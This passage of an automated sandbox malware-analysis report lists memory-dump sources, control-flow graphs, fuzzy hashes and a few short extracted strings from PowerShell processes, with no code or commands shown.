                                                                        • Source File: 00000008.00000002.529296081.000007FE89990000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89990000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89990000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c8657eb1866d3a09ed82ca6a6449d5af164c905957afd564dde86f89b2c60c8
                                                                        • Instruction ID: 5a879a4bd43039927ec1e1a18b5e38d8993ef72d526dbbe0c02b5738259c278d
                                                                        • Opcode Fuzzy Hash: 0c8657eb1866d3a09ed82ca6a6449d5af164c905957afd564dde86f89b2c60c8
                                                                        • Instruction Fuzzy Hash: 0721C12191D3D14FE716AB68AC512E87FA0EF03324F0842E7C099870F3D629745AC796

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 96 7fe89a68549-7fe89a685f9 97 7fe89a685ff-7fe89a68609 96->97 98 7fe89a68add-7fe89a68b96 96->98 99 7fe89a68622-7fe89a68629 97->99 100 7fe89a6860b-7fe89a68618 97->100 102 7fe89a68640 99->102 103 7fe89a6862b-7fe89a6863e 99->103 100->99 101 7fe89a6861a-7fe89a68620 100->101 101->99 105 7fe89a68642-7fe89a68644 102->105 103->105 107 7fe89a6864a-7fe89a68656 105->107 108 7fe89a68a58-7fe89a68a62 105->108 107->98 112 7fe89a6865c-7fe89a68666 107->112 110 7fe89a68a75-7fe89a68a85 108->110 111 7fe89a68a64-7fe89a68a74 108->111 114 7fe89a68a92-7fe89a68adc 110->114 115 7fe89a68a87-7fe89a68a8b 110->115 116 7fe89a68682-7fe89a68692 112->116 117 7fe89a68668-7fe89a68675 112->117 115->114 116->108 122 7fe89a68698-7fe89a686cc 116->122 117->116 118 7fe89a68677-7fe89a68680 117->118 118->116 122->108 128 7fe89a686d2-7fe89a686de 122->128 128->98 129 7fe89a686e4-7fe89a686ee 128->129 130 7fe89a686f0-7fe89a686fd 129->130 131 7fe89a68707-7fe89a6870c 129->131 130->131 132 7fe89a686ff-7fe89a68705 130->132 131->108 133 7fe89a68712-7fe89a68717 131->133 132->131 133->108 134 7fe89a6871d-7fe89a68722 133->134 134->108 136 7fe89a68728-7fe89a68737 134->136 137 7fe89a68739-7fe89a68743 136->137 138 7fe89a68747 136->138 139 7fe89a68745 137->139 140 7fe89a68763-7fe89a687ee 137->140 141 7fe89a6874c-7fe89a68759 138->141 139->141 148 7fe89a68802-7fe89a68824 140->148 149 7fe89a687f0-7fe89a687fb 140->149 141->140 142 7fe89a6875b-7fe89a68761 141->142 142->140 150 7fe89a68834 148->150 151 7fe89a68826-7fe89a68830 148->151 149->148 154 7fe89a68839-7fe89a68846 150->154 152 7fe89a68832 151->152 153 7fe89a68850-7fe89a688de 151->153 152->154 161 7fe89a688f2-7fe89a68910 153->161 162 7fe89a688e0-7fe89a688eb 153->162 154->153 155 7fe89a68848-7fe89a6884e 154->155 155->153 163 7fe89a68912-7fe89a6891c 161->163 164 7fe89a68920 161->164 162->161 165 7fe89a6891e 163->165 166 7fe89a6893d-7fe89a689cd 163->166 167 7fe89a68925-7fe89a68933 164->167 165->167 174 7fe89a689e1-7fe89a68a3a 166->174 175 7fe89a689cf-7fe89a689da 166->175 167->166 169 7fe89a68935-7fe89a6893b 167->169 169->166 178 7fe89a68a42-7fe89a68a57 174->178 175->174
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2fed76b0151ac51bf29aa5920ef76140304c54ca6a72d988561f4774ec8a21f
                                                                        • Instruction ID: 4ce5c59cdd6a77146d9154ee0e02586260b23b43e36a01b6b904a211e63cb220
                                                                        • Opcode Fuzzy Hash: f2fed76b0151ac51bf29aa5920ef76140304c54ca6a72d988561f4774ec8a21f
                                                                        • Instruction Fuzzy Hash: AF22E43090CB894FE79ADB2C84516697FE2FF9A344F2401EED48EC72A3DA25AC55C741

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 7fe89a64165-7fe89a641f4 180 7fe89a641fa-7fe89a64204 179->180 181 7fe89a64457-7fe89a64516 179->181 182 7fe89a6421d-7fe89a64222 180->182 183 7fe89a64206-7fe89a64213 180->183 185 7fe89a643fb-7fe89a64405 182->185 186 7fe89a64228-7fe89a6422b 182->186 183->182 187 7fe89a64215-7fe89a6421b 183->187 190 7fe89a64414-7fe89a64424 185->190 191 7fe89a64407-7fe89a64413 185->191 188 7fe89a64242 186->188 189 7fe89a6422d-7fe89a64240 186->189 187->182 194 7fe89a64244-7fe89a64246 188->194 189->194 195 7fe89a64431-7fe89a64454 190->195 196 7fe89a64426-7fe89a6442a 190->196 194->185 197 7fe89a6424c-7fe89a64280 194->197 195->181 196->195 204 7fe89a64282-7fe89a64295 197->204 205 7fe89a64297 197->205 206 7fe89a64299-7fe89a6429b 204->206 205->206 206->185 208 7fe89a642a1-7fe89a642a9 206->208 208->181 209 7fe89a642af-7fe89a642b9 208->209 210 7fe89a642d5-7fe89a642e5 209->210 211 7fe89a642bb-7fe89a642c8 209->211 210->185 215 7fe89a642eb-7fe89a6431c 210->215 211->210 212 7fe89a642ca-7fe89a642d3 211->212 212->210 215->185 218 7fe89a64322-7fe89a6434e 215->218 220 7fe89a64374 218->220 221 7fe89a64350-7fe89a64372 218->221 222 7fe89a64376-7fe89a64378 220->222 221->222 222->185 224 7fe89a6437e-7fe89a64386 222->224 225 7fe89a64388-7fe89a64392 224->225 226 7fe89a64396 224->226 228 7fe89a64394 225->228 229 7fe89a643b2-7fe89a643e1 225->229 230 7fe89a6439b-7fe89a643a8 226->230 228->230 233 7fe89a643e8-7fe89a643fa 229->233 230->229 232 7fe89a643aa-7fe89a643b0 230->232 232->229
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aefbb00e8f3f3c6292156400e7466aeabecc919fb728bc94672263213a918f42
                                                                        • Instruction ID: a4ec02ffcfad39b46a565880a7ccc487bbf919dd3631440fc547f11f6ed7f587
                                                                        • Opcode Fuzzy Hash: aefbb00e8f3f3c6292156400e7466aeabecc919fb728bc94672263213a918f42
                                                                        • Instruction Fuzzy Hash: 10C1372091DBCA0FE74BA76C54546BA7FE1EF46744F1801EAD48ECB1A3C618AC56C361

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 235 7fe89a60f0d-7fe89a60f96 237 7fe89a60f9c-7fe89a60fa6 235->237 238 7fe89a61098-7fe89a610dc 235->238 239 7fe89a60fbf-7fe89a60fee 237->239 240 7fe89a60fa8-7fe89a60fb5 237->240 245 7fe89a610de-7fe89a610e7 238->245 246 7fe89a610ed-7fe89a61124 238->246 239->238 251 7fe89a60ff4-7fe89a60ffe 239->251 240->239 242 7fe89a60fb7-7fe89a60fbd 240->242 242->239 245->246 249 7fe89a611c1-7fe89a611cb 246->249 250 7fe89a6112a-7fe89a6119e 246->250 252 7fe89a611cd-7fe89a611d7 249->252 253 7fe89a611d8-7fe89a611e8 249->253 269 7fe89a611a6-7fe89a611be 250->269 254 7fe89a61000-7fe89a6100d 251->254 255 7fe89a61017-7fe89a61077 251->255 256 7fe89a611f5-7fe89a6121a 253->256 257 7fe89a611ea-7fe89a611ee 253->257 254->255 259 7fe89a6100f-7fe89a61015 254->259 266 7fe89a6108b-7fe89a61097 255->266 267 7fe89a61079-7fe89a61084 255->267 257->256 259->255 267->266 269->249
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be62eb5e809b78a2b2271789150396114ec14a468d8428157dd36a2bc8d66003
                                                                        • Instruction ID: 2456561a9d1bfa6403fe793996c1d997e143efc02beffe31fcdabfe49f07b54b
                                                                        • Opcode Fuzzy Hash: be62eb5e809b78a2b2271789150396114ec14a468d8428157dd36a2bc8d66003
                                                                        • Instruction Fuzzy Hash: B2A1E420A0DBC90FE757977C58646607FE1EF47254B2A41EBC48ECB1B3DA189C5AC352
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb2fcbe96feb007ed5a4934c944683aabf862acc2c2ccf86d4d6b7917ef71725
                                                                        • Instruction ID: 0ccaaca25dd0fa9003ab09b31d65c51e052a6417d3d17b2cc8deb17d908e4981
                                                                        • Opcode Fuzzy Hash: bb2fcbe96feb007ed5a4934c944683aabf862acc2c2ccf86d4d6b7917ef71725
                                                                        • Instruction Fuzzy Hash: D1A1352080EBC90FD747A77898142A63FF1EF4B254F1901EBD48DCB1A3DA199D1AC362
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8102f3be21c2518df007a80bd1a81ea6accab84265a289ebd35f9438c4437e47
                                                                        • Instruction ID: f7ace723bba891f6e16c7aee356db02deead69a952ca8492167af6e952c11e72
                                                                        • Opcode Fuzzy Hash: 8102f3be21c2518df007a80bd1a81ea6accab84265a289ebd35f9438c4437e47
                                                                        • Instruction Fuzzy Hash: D2D1233190DBC94FEB96A73C88646A57FE1FF5A254F1901EBD08DC71A3C629AC09C352
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XhT$XhT
                                                                        • API String ID: 0-3828503999
                                                                        • Opcode ID: 7805a61cb1a5843f86e3e94bd0042b58b6054322d7e4017538a708b88845edf4
                                                                        • Instruction ID: 236af1201ecb0b1ff94622d176cd98d0271becdc121f8464547650e894501680
                                                                        • Opcode Fuzzy Hash: 7805a61cb1a5843f86e3e94bd0042b58b6054322d7e4017538a708b88845edf4
                                                                        • Instruction Fuzzy Hash: 5552F930A0CA8D4FE74AEB6C84547697FE2FF5A344F2401EAD04EC72A3DA25AC56C751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (be$XhT
                                                                        • API String ID: 0-1561679238
                                                                        • Opcode ID: 809496943b3b7f5620d96f145d356b29eafcf34eb945850ed7809c1a0412effa
                                                                        • Instruction ID: a90c56896d4d5cc82d78dc5b108c31ecd78eeaaec30bdd0c7d7025e59c5e7578
                                                                        • Opcode Fuzzy Hash: 809496943b3b7f5620d96f145d356b29eafcf34eb945850ed7809c1a0412effa
                                                                        • Instruction Fuzzy Hash: CAC1D024A0DBCA0FE756A73818643797FE1EF87254F1900EBD09EC71A3D918AC59C362
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 88M$XhT
                                                                        • API String ID: 0-50409379
                                                                        • Opcode ID: a3d5e61ffd8bb4f52a76a2e9ca3669ad9357d143938d0549614af055ac8dc850
                                                                        • Instruction ID: e9c556fbae60add3bb2a660c8fbef8295f87c6586d3c3a4755de54c03cb03c4e
                                                                        • Opcode Fuzzy Hash: a3d5e61ffd8bb4f52a76a2e9ca3669ad9357d143938d0549614af055ac8dc850
                                                                        • Instruction Fuzzy Hash: E9414731A0CA894FEB56E72C54117B8BBE1FF49340F2810EBC44EC31A3DA15AC55C381
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XhT
                                                                        • API String ID: 0-3355534747
                                                                        • Opcode ID: a30b68682517e67549f5cc0316125f5d148374ab3ed44702da64f1d1da8bfa8d
                                                                        • Instruction ID: 2a58e6c54c16b3291f8e62b627de053b5b7b908b79d20bc618d0ffed940f0a4c
                                                                        • Opcode Fuzzy Hash: a30b68682517e67549f5cc0316125f5d148374ab3ed44702da64f1d1da8bfa8d
                                                                        • Instruction Fuzzy Hash: EB42C120A0DBCA0FE746A73C58647A57FE1EF5A244F1901EBD48DCB1A3DA18AC56C352
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd